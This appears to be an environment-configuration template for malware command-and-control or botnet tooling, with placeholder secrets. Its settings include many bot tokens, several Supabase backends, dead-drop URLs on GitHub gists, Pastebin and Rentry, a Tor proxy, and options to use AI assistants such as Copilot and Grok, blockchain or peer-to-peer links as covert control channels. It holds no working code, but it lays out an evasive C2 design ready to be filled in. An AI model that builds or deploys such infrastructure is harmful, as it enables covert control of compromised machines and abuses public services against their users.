MASTER_SECRET_B64=your_base64_encoded_32_byte_key
SALT=your_random_salt_at_least_16_bytes
ADMIN_ID=123456789
BOT_TOKENS=token1,token2,token3,token4,token5,token6,token7,token8,token9,token10
SUPABASE_URLS=https://project1.supabase.co,https://project2.supabase.co,https://project3.supabase.co,https://project4.supabase.co
SUPABASE_KEYS=anon_key1,anon_key2,anon_key3,anon_key4
DEAD_DROP_URLS=https://gist.githubusercontent.com/user1/gistid/raw,https://gist.githubusercontent.com/user2/gistid/raw,https://pastebin.com/raw/id,https://rentry.co/raw/id
GITHUB_RAW_URLS=https://raw.githubusercontent.com/user1/repo/branch/,https://raw.githubusercontent.com/user2/repo/branch/
ACCESS_KEY=your_strong_access_key
USE_TOR=false
TOR_PROXY=socks5h://127.0.0.1:9050
USE_AI_C2=false
AI_C2_ENDPOINTS=https://copilot.microsoft.com,https://grok.x.ai
USE_BLOCKCHAIN=false
USE_P2P=false
USE_MCP=false